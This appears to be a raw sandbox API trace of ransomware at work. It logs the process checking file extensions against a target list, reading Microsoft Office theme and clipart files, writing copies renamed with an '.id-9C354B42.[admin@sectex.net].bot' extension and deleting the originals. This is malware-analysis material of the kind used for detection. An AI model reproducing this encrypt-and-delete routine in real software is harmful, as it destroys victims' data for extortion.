	[0141.036] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1b10, lpOverlapped=0x0) returned 1
	[0141.037] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.037] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.037] SetEndOfFile (hFile=0x3a8) returned 1
	[0141.037] CloseHandle (hObject=0x3a8) returned 1
	[0141.037] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.038] SetEndOfFile (hFile=0x3b8) returned 1
	[0141.040] CloseHandle (hObject=0x3b8) returned 1
	[0141.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.041] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid")) returned 1
	[0141.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.041] lstrlenW (lpString=".doc") returned 4
	[0141.041] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.041] lstrlenW (lpString=".docx") returned 5
	[0141.041] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.041] lstrlenW (lpString=".pdf") returned 4
	[0141.041] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.041] lstrlenW (lpString=".xls") returned 4
	[0141.041] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.041] lstrlenW (lpString=".xlsx") returned 5
	[0141.041] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.041] lstrlenW (lpString=".ppt") returned 4
	[0141.041] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.041] lstrlenW (lpString=".zip") returned 4
	[0141.041] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.041] lstrlenW (lpString=".rar") returned 4
	[0141.042] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.042] lstrlenW (lpString=".bz2") returned 4
	[0141.042] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.042] lstrlenW (lpString=".7z") returned 3
	[0141.042] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.042] lstrlenW (lpString=".dbf") returned 4
	[0141.042] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.042] lstrlenW (lpString=".1cd") returned 4
	[0141.042] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.042] lstrlenW (lpString=".jpg") returned 4
	[0141.042] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.042] lstrlenW (lpString=".doc") returned 4
	[0141.042] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.042] lstrlenW (lpString=".docx") returned 5
	[0141.042] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.042] lstrlenW (lpString=".pdf") returned 4
	[0141.042] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.042] lstrlenW (lpString=".xls") returned 4
	[0141.042] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.042] lstrlenW (lpString=".xlsx") returned 5
	[0141.042] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.042] lstrlenW (lpString=".ppt") returned 4
	[0141.042] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.042] lstrlenW (lpString=".zip") returned 4
	[0141.042] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.042] lstrlenW (lpString=".rar") returned 4
	[0141.042] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.042] lstrlenW (lpString=".bz2") returned 4
	[0141.043] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.043] lstrlenW (lpString=".7z") returned 3
	[0141.043] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.043] lstrlenW (lpString=".dbf") returned 4
	[0141.043] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.043] lstrlenW (lpString=".1cd") returned 4
	[0141.043] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63
	[0141.043] lstrlenW (lpString=".jpg") returned 4
	[0141.043] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.043] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.043] lstrlenW (lpString="Adjacency.eftx") returned 14
	[0141.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.236] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=21089) returned 1
	[0141.236] CloseHandle (hObject=0x3ac) returned 1
	[0141.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx")) returned 0x20
	[0141.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.274] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.274] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.276] GetLastError () returned 0x0
	[0141.276] ReadFile (in: hFile=0x3a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x5261, lpOverlapped=0x0) returned 1
	[0141.278] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x5270, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x5270, lpOverlapped=0x0) returned 1
	[0141.280] ReadFile (in: hFile=0x3a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.280] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0141.280] SetEndOfFile (hFile=0x31c) returned 1
	[0141.280] CloseHandle (hObject=0x31c) returned 1
	[0141.280] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.280] SetEndOfFile (hFile=0x3a0) returned 1
	[0141.282] CloseHandle (hObject=0x3a0) returned 1
	[0141.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.283] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx")) returned 1
	[0141.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.283] lstrlenW (lpString=".doc") returned 4
	[0141.283] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString=".docx") returned 5
	[0141.284] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.284] lstrlenW (lpString=".pdf") returned 4
	[0141.284] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString=".xls") returned 4
	[0141.284] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString=".xlsx") returned 5
	[0141.284] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.284] lstrlenW (lpString=".ppt") returned 4
	[0141.284] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.284] lstrlenW (lpString=".zip") returned 4
	[0141.284] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString=".rar") returned 4
	[0141.284] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString=".bz2") returned 4
	[0141.284] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString=".7z") returned 3
	[0141.284] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.284] lstrlenW (lpString=".dbf") returned 4
	[0141.284] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.284] lstrlenW (lpString=".1cd") returned 4
	[0141.284] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.284] lstrlenW (lpString=".jpg") returned 4
	[0141.284] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.284] lstrlenW (lpString=".doc") returned 4
	[0141.284] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.285] lstrlenW (lpString=".docx") returned 5
	[0141.285] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.285] lstrlenW (lpString=".pdf") returned 4
	[0141.285] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.285] lstrlenW (lpString=".xls") returned 4
	[0141.285] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.285] lstrlenW (lpString=".xlsx") returned 5
	[0141.285] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.285] lstrlenW (lpString=".ppt") returned 4
	[0141.285] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.285] lstrlenW (lpString=".zip") returned 4
	[0141.285] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.285] lstrlenW (lpString=".rar") returned 4
	[0141.285] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.285] lstrlenW (lpString=".bz2") returned 4
	[0141.285] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.285] lstrlenW (lpString=".7z") returned 3
	[0141.285] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.285] lstrlenW (lpString=".dbf") returned 4
	[0141.285] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.285] lstrlenW (lpString=".1cd") returned 4
	[0141.285] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81
	[0141.285] lstrlenW (lpString=".jpg") returned 4
	[0141.285] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.285] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.285] lstrlenW (lpString="Aspect.eftx") returned 11
	[0141.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.286] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=22554) returned 1
	[0141.287] CloseHandle (hObject=0x3a0) returned 1
	[0141.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx")) returned 0x20
	[0141.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.287] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.287] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.288] GetLastError () returned 0x0
	[0141.288] ReadFile (in: hFile=0x3a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x581a, lpOverlapped=0x0) returned 1
	[0141.290] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x5820, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x5820, lpOverlapped=0x0) returned 1
	[0141.291] ReadFile (in: hFile=0x3a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.291] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0141.291] SetEndOfFile (hFile=0x31c) returned 1
	[0141.291] CloseHandle (hObject=0x31c) returned 1
	[0141.292] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.292] SetEndOfFile (hFile=0x3a0) returned 1
	[0141.294] CloseHandle (hObject=0x3a0) returned 1
	[0141.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.294] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx")) returned 1
	[0141.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.295] lstrlenW (lpString=".doc") returned 4
	[0141.295] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.295] lstrlenW (lpString=".docx") returned 5
	[0141.295] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.295] lstrlenW (lpString=".pdf") returned 4
	[0141.295] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.295] lstrlenW (lpString=".xls") returned 4
	[0141.295] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.295] lstrlenW (lpString=".xlsx") returned 5
	[0141.295] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.295] lstrlenW (lpString=".ppt") returned 4
	[0141.295] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.295] lstrlenW (lpString=".zip") returned 4
	[0141.295] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.295] lstrlenW (lpString=".rar") returned 4
	[0141.295] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.295] lstrlenW (lpString=".bz2") returned 4
	[0141.295] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.295] lstrlenW (lpString=".7z") returned 3
	[0141.295] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.295] lstrlenW (lpString=".dbf") returned 4
	[0141.296] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.296] lstrlenW (lpString=".1cd") returned 4
	[0141.296] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.296] lstrlenW (lpString=".jpg") returned 4
	[0141.296] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.296] lstrlenW (lpString=".doc") returned 4
	[0141.296] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.296] lstrlenW (lpString=".docx") returned 5
	[0141.296] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.296] lstrlenW (lpString=".pdf") returned 4
	[0141.296] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.296] lstrlenW (lpString=".xls") returned 4
	[0141.296] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.296] lstrlenW (lpString=".xlsx") returned 5
	[0141.296] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.296] lstrlenW (lpString=".ppt") returned 4
	[0141.296] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.296] lstrlenW (lpString=".zip") returned 4
	[0141.296] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.296] lstrlenW (lpString=".rar") returned 4
	[0141.296] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.296] lstrlenW (lpString=".bz2") returned 4
	[0141.296] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.297] lstrlenW (lpString=".7z") returned 3
	[0141.297] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.297] lstrlenW (lpString=".dbf") returned 4
	[0141.297] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.297] lstrlenW (lpString=".1cd") returned 4
	[0141.297] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78
	[0141.297] lstrlenW (lpString=".jpg") returned 4
	[0141.297] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.297] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.297] lstrlenW (lpString="Austin.eftx") returned 11
	[0141.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.298] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=26989) returned 1
	[0141.298] CloseHandle (hObject=0x3a0) returned 1
	[0141.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx")) returned 0x20
	[0141.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.299] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.299] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.299] GetLastError () returned 0x0
	[0141.299] ReadFile (in: hFile=0x3a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x696d, lpOverlapped=0x0) returned 1
	[0141.301] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x6970, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x6970, lpOverlapped=0x0) returned 1
